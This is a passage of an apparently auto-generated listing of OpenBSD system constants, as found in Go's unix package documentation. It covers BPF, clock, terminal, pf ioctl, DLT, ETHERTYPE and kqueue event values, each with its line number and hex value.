= 0x0 constant BPF_X (line 156) | BPF_X = 0x8 constant BRKINT (line 157) | BRKINT = 0x2 constant CFLUSH (line 158) | CFLUSH = 0xf constant CLOCAL (line 159) | CLOCAL = 0x8000 constant CLOCK_BOOTTIME (line 160) | CLOCK_BOOTTIME = 0x6 constant CLOCK_MONOTONIC (line 161) | CLOCK_MONOTONIC = 0x3 constant CLOCK_PROCESS_CPUTIME_ID (line 162) | CLOCK_PROCESS_CPUTIME_ID = 0x2 constant CLOCK_REALTIME (line 163) | CLOCK_REALTIME = 0x0 constant CLOCK_THREAD_CPUTIME_ID (line 164) | CLOCK_THREAD_CPUTIME_ID = 0x4 constant CLOCK_UPTIME (line 165) | CLOCK_UPTIME = 0x5 constant CPUSTATES (line 166) | CPUSTATES = 0x6 constant CP_IDLE (line 167) | CP_IDLE = 0x5 constant CP_INTR (line 168) | CP_INTR = 0x4 constant CP_NICE (line 169) | CP_NICE = 0x1 constant CP_SPIN (line 170) | CP_SPIN = 0x3 constant CP_SYS (line 171) | CP_SYS = 0x2 constant CP_USER (line 172) | CP_USER = 0x0 constant CREAD (line 173) | CREAD = 0x800 constant CRTSCTS (line 174) | CRTSCTS = 0x10000 constant CS5 (line 175) | CS5 = 0x0 constant CS6 (line 176) | CS6 = 0x100 constant CS7 (line 177) | CS7 = 0x200 constant CS8 (line 178) | CS8 = 0x300 constant CSIZE (line 179) | CSIZE = 0x300 constant CSTART (line 180) | CSTART = 0x11 constant CSTATUS (line 181) | CSTATUS = 0xff constant CSTOP (line 182) | CSTOP = 0x13 constant CSTOPB (line 183) | CSTOPB = 0x400 constant CSUSP (line 184) | CSUSP = 0x1a constant CTL_HW (line 185) | CTL_HW = 0x6 constant CTL_KERN (line 186) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 187) | CTL_MAXNAME = 0xc constant CTL_NET (line 188) | CTL_NET = 0x4 constant DIOCADDQUEUE (line 189) | DIOCADDQUEUE = 0xc110445d constant DIOCADDRULE (line 190) | DIOCADDRULE = 0xcd604404 constant DIOCADDSTATE (line 191) | DIOCADDSTATE = 0xc1084425 constant DIOCCHANGERULE (line 192) | DIOCCHANGERULE = 0xcd60441a constant DIOCCLRIFFLAG (line 193) | DIOCCLRIFFLAG = 0xc028445a constant DIOCCLRSRCNODES (line 194) | DIOCCLRSRCNODES = 0x20004455 constant DIOCCLRSTATES (line 195) | DIOCCLRSTATES = 0xc0e04412 constant DIOCCLRSTATUS (line 196) | DIOCCLRSTATUS = 0xc0284416 constant DIOCGETLIMIT (line 197) | DIOCGETLIMIT = 0xc0084427 constant DIOCGETQSTATS (line 198) | DIOCGETQSTATS = 0xc1204460 constant DIOCGETQUEUE (line 199) | DIOCGETQUEUE = 0xc110445f constant DIOCGETQUEUES (line 200) | DIOCGETQUEUES = 0xc110445e constant DIOCGETRULE (line 201) | DIOCGETRULE = 0xcd604407 constant DIOCGETRULES (line 202) | DIOCGETRULES = 0xcd604406 constant DIOCGETRULESET (line 203) | DIOCGETRULESET = 0xc444443b constant DIOCGETRULESETS (line 204) | DIOCGETRULESETS = 0xc444443a constant DIOCGETSRCNODES (line 205) | DIOCGETSRCNODES = 0xc0104454 constant DIOCGETSTATE (line 206) | DIOCGETSTATE = 0xc1084413 constant DIOCGETSTATES (line 207) | DIOCGETSTATES = 0xc0104419 constant DIOCGETSTATUS (line 208) | DIOCGETSTATUS = 0xc1e84415 constant DIOCGETSYNFLWATS (line 209) | DIOCGETSYNFLWATS = 0xc0084463 constant DIOCGETTIMEOUT (line 210) | DIOCGETTIMEOUT = 0xc008441e constant DIOCIGETIFACES (line 211) | DIOCIGETIFACES = 0xc0284457 constant DIOCKILLSRCNODES (line 212) | DIOCKILLSRCNODES = 0xc080445b constant DIOCKILLSTATES (line 213) | DIOCKILLSTATES = 0xc0e04429 constant DIOCNATLOOK (line 214) | DIOCNATLOOK = 0xc0504417 constant DIOCOSFPADD (line 215) | DIOCOSFPADD = 0xc088444f constant DIOCOSFPFLUSH (line 216) | DIOCOSFPFLUSH = 0x2000444e constant DIOCOSFPGET (line 217) | DIOCOSFPGET = 0xc0884450 constant DIOCRADDADDRS (line 218) | DIOCRADDADDRS = 0xc4504443 constant DIOCRADDTABLES (line 219) | DIOCRADDTABLES = 0xc450443d constant DIOCRCLRADDRS (line 220) | DIOCRCLRADDRS = 0xc4504442 constant DIOCRCLRASTATS (line 221) | DIOCRCLRASTATS = 0xc4504448 constant DIOCRCLRTABLES (line 222) | DIOCRCLRTABLES = 0xc450443c constant DIOCRCLRTSTATS (line 223) | DIOCRCLRTSTATS = 0xc4504441 constant DIOCRDELADDRS (line 224) | DIOCRDELADDRS = 0xc4504444 constant DIOCRDELTABLES (line 225) | DIOCRDELTABLES = 0xc450443e constant DIOCRGETADDRS (line 226) | DIOCRGETADDRS = 0xc4504446 constant DIOCRGETASTATS (line 227) | DIOCRGETASTATS = 0xc4504447 constant DIOCRGETTABLES (line 228) | DIOCRGETTABLES = 0xc450443f constant DIOCRGETTSTATS (line 229) | DIOCRGETTSTATS = 0xc4504440 constant DIOCRINADEFINE (line 230) | DIOCRINADEFINE = 0xc450444d constant DIOCRSETADDRS (line 231) | DIOCRSETADDRS = 0xc4504445 constant DIOCRSETTFLAGS (line 232) | DIOCRSETTFLAGS = 0xc450444a constant DIOCRTSTADDRS (line 233) | DIOCRTSTADDRS = 0xc4504449 constant DIOCSETDEBUG (line 234) | DIOCSETDEBUG = 0xc0044418 constant DIOCSETHOSTID (line 235) | DIOCSETHOSTID = 0xc0044456 constant DIOCSETIFFLAG (line 236) | DIOCSETIFFLAG = 0xc0284459 constant DIOCSETLIMIT (line 237) | DIOCSETLIMIT = 0xc0084428 constant DIOCSETREASS (line 238) | DIOCSETREASS = 0xc004445c constant DIOCSETSTATUSIF (line 239) | DIOCSETSTATUSIF = 0xc0284414 constant DIOCSETSYNCOOKIES (line 240) | DIOCSETSYNCOOKIES = 0xc0014462 constant DIOCSETSYNFLWATS (line 241) | DIOCSETSYNFLWATS = 0xc0084461 constant DIOCSETTIMEOUT (line 242) | DIOCSETTIMEOUT = 0xc008441d constant DIOCSTART (line 243) | DIOCSTART = 0x20004401 constant DIOCSTOP (line 244) | DIOCSTOP = 0x20004402 constant DIOCXBEGIN (line 245) | DIOCXBEGIN = 0xc0104451 constant DIOCXCOMMIT (line 246) | DIOCXCOMMIT = 0xc0104452 constant DIOCXROLLBACK (line 247) | DIOCXROLLBACK = 0xc0104453 constant DLT_ARCNET (line 248) | DLT_ARCNET = 0x7 constant DLT_ATM_RFC1483 (line 249) | DLT_ATM_RFC1483 = 0xb constant DLT_AX25 (line 250) | DLT_AX25 = 0x3 constant DLT_CHAOS (line 251) | DLT_CHAOS = 0x5 constant DLT_C_HDLC (line 252) | DLT_C_HDLC = 0x68 constant DLT_EN10MB (line 253) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 254) | DLT_EN3MB = 0x2 constant DLT_ENC (line 255) | DLT_ENC = 0xd constant DLT_FDDI (line 256) | DLT_FDDI = 0xa constant DLT_IEEE802 (line 257) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 258) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 259) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_LOOP (line 260) | DLT_LOOP = 0xc constant DLT_MPLS (line 261) | DLT_MPLS = 0xdb constant DLT_NULL (line 262) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 263) | DLT_OPENFLOW = 0x10b constant DLT_PFLOG (line 264) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 265) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 266) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 267) | DLT_PPP_BSDOS = 0x10 constant DLT_PPP_ETHER (line 268) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_SERIAL (line 269) | DLT_PPP_SERIAL = 0x32 constant DLT_PRONET (line 270) | DLT_PRONET = 0x4 constant DLT_RAW (line 271) | DLT_RAW = 0xe constant DLT_SLIP (line 272) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 273) | DLT_SLIP_BSDOS = 0xf constant DLT_USBPCAP (line 274) | DLT_USBPCAP = 0xf9 constant DLT_USER0 (line 275) | DLT_USER0 = 0x93 constant DLT_USER1 (line 276) | DLT_USER1 = 0x94 constant DLT_USER10 (line 277) | DLT_USER10 = 0x9d constant DLT_USER11 (line 278) | DLT_USER11 = 0x9e constant DLT_USER12 (line 279) | DLT_USER12 = 0x9f constant DLT_USER13 (line 280) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 281) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 282) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 283) | DLT_USER2 = 0x95 constant DLT_USER3 (line 284) | DLT_USER3 = 0x96 constant DLT_USER4 (line 285) | DLT_USER4 = 0x97 constant DLT_USER5 (line 286) | DLT_USER5 = 0x98 constant DLT_USER6 (line 287) | DLT_USER6 = 0x99 constant DLT_USER7 (line 288) | DLT_USER7 = 0x9a constant DLT_USER8 (line 289) | DLT_USER8 = 0x9b constant DLT_USER9 (line 290) | DLT_USER9 = 0x9c constant DT_BLK (line 291) | DT_BLK = 0x6 constant DT_CHR (line 292) | DT_CHR = 0x2 constant DT_DIR (line 293) | DT_DIR = 0x4 constant DT_FIFO (line 294) | DT_FIFO = 0x1 constant DT_LNK (line 295) | DT_LNK = 0xa constant DT_REG (line 296) | DT_REG = 0x8 constant DT_SOCK (line 297) | DT_SOCK = 0xc constant DT_UNKNOWN (line 298) | DT_UNKNOWN = 0x0 constant ECHO (line 299) | ECHO = 0x8 constant ECHOCTL (line 300) | ECHOCTL = 0x40 constant ECHOE (line 301) | ECHOE = 0x2 constant ECHOK (line 302) | ECHOK = 0x4 constant ECHOKE (line 303) | ECHOKE = 0x1 constant ECHONL (line 304) | ECHONL = 0x10 constant ECHOPRT (line 305) | ECHOPRT = 0x20 constant EMT_TAGOVF (line 306) | EMT_TAGOVF = 0x1 constant EMUL_ENABLED (line 307) | EMUL_ENABLED = 0x1 constant EMUL_NATIVE (line 308) | EMUL_NATIVE = 0x2 constant ENDRUNDISC (line 309) | ENDRUNDISC = 0x9 constant ETH64_8021_RSVD_MASK (line 310) | ETH64_8021_RSVD_MASK = 0xfffffffffff0 constant ETH64_8021_RSVD_PREFIX (line 311) | ETH64_8021_RSVD_PREFIX = 0x180c2000000 constant ETHERMIN (line 312) | ETHERMIN = 0x2e constant ETHERMTU (line 313) | ETHERMTU = 0x5dc constant ETHERTYPE_8023 (line 314) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 315) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 316) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 317) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 318) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 319) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 320) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_AOE (line 321) | ETHERTYPE_AOE = 0x88a2 constant ETHERTYPE_APOLLO (line 322) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 323) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 324) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 325) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 326) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 327) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 328) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 329) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 330) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 331) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 332) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 333) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 334) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 335) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 336) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 337) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 338) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 339) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 340) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 341) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 342) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 343) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 344) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 345) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 346) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 347) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 348) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 349) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 350) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 351) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 352) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 353) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 354) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 355) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 356) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 357) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 358) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 359) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 360) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 361) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 362) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 363) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_EAPOL (line 364) | ETHERTYPE_EAPOL = 0x888e constant ETHERTYPE_ECMA (line 365) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 366) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 367) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 368) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 369) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 370) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 371) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 372) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 373) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 374) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 375) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 376) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 377) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 378) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 379) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 380) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 381) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 382) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 383) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 384) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 385) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 386) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 387) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 388) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 389) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 390) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 391) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 392) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LLDP (line 393) | ETHERTYPE_LLDP = 0x88cc constant ETHERTYPE_LOGICRAFT (line 394) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 395) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MACSEC (line 396) | ETHERTYPE_MACSEC = 0x88e5 constant ETHERTYPE_MATRA (line 397) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 398) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 399) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 400) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 401) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 402) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 403) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 404) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 405) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 406) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 407) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 408) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 409) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 410) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 411) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 412) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 413) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 414) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 415) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 416) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 417) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 418) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 419) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 420) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 421) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 422) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 423) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 424) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NHRP (line 425) | ETHERTYPE_NHRP = 0x2001 constant ETHERTYPE_NOVELL (line 426) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 427) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 428) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 429) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NSH (line 430) | ETHERTYPE_NSH = 0x984f constant ETHERTYPE_NTRAILER (line 431) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 432) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 433) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 434) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PBB (line 435) | ETHERTYPE_PBB = 0x88e7 constant ETHERTYPE_PCS (line 436) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 437) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 438) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 439) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 440) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 441) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 442) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 443) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_QINQ (line 444) | ETHERTYPE_QINQ = 0x88a8 constant ETHERTYPE_RACAL (line 445) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 446) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 447) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 448) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 449) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 450) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 451) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 452) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 453) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 454) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 455) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 456) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 457) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 458) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 459) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 460) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOW (line 461) | ETHERTYPE_SLOW = 0x8809 constant ETHERTYPE_SNA (line 462) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 463) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 464) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 465) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 466) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 467) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 468) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 469) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 470) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 471) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 472) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 473) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 474) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 475) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 476) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 477) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 478) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 479) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 480) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 481) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 482) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 483) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 484) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 485) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 486) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 487) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 488) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 489) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 490) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 491) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 492) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 493) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 494) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 495) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 496) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 497) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 498) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 499) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 500) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 501) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 502) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 503) | ETHER_ADDR_LEN = 0x6 constant ETHER_ALIGN (line 504) | ETHER_ALIGN = 0x2 constant ETHER_CRC_LEN (line 505) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 506) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 507) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 508) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_DIX_LEN (line 509) | ETHER_MAX_DIX_LEN = 0x600 constant ETHER_MAX_HARDMTU_LEN (line 510) | ETHER_MAX_HARDMTU_LEN = 0xff9b constant ETHER_MAX_LEN (line 511) | ETHER_MAX_LEN = 0x5ee constant ETHER_MIN_LEN (line 512) | ETHER_MIN_LEN = 0x40 constant ETHER_TYPE_LEN (line 513) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 514) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 515) | EVFILT_AIO = -0x3 constant EVFILT_DEVICE (line 516) | EVFILT_DEVICE = -0x8 constant EVFILT_EXCEPT (line 517) | EVFILT_EXCEPT = -0x9 constant EVFILT_PROC (line 518) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 519) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 520) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 521) | EVFILT_SYSCOUNT = 0x9 constant EVFILT_TIMER (line 522) | EVFILT_TIMER = -0x7 constant EVFILT_VNODE (line 523) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 524) | EVFILT_WRITE = -0x2 constant EVL_ENCAPLEN (line 525) | EVL_ENCAPLEN = 0x4 constant EVL_PRIO_BITS (line 526) | EVL_PRIO_BITS = 0xd constant EVL_PRIO_MAX (line 527) | EVL_PRIO_MAX = 0x7 constant EVL_VLID_MASK (line 528) | EVL_VLID_MASK = 0xfff constant EVL_VLID_MAX (line 529) | EVL_VLID_MAX = 0xffe constant EVL_VLID_MIN (line 530) | EVL_VLID_MIN = 0x1 constant EVL_VLID_NULL (line 531) | EVL_VLID_NULL = 0x0 constant EV_ADD (line 532) | EV_ADD = 0x1 constant EV_CLEAR (line 533) | EV_CLEAR = 0x20 constant EV_DELETE (line 534) | EV_DELETE = 0x2 constant EV_DISABLE (line 535) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 536) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 537) | EV_ENABLE = 0x4 constant EV_EOF (line 538) | EV_EOF = 0x8000 constant EV_ERROR (line 539) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 540) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 541) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 542) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 543) | EV_SYSFLAGS = 0xf800 constant EXTA 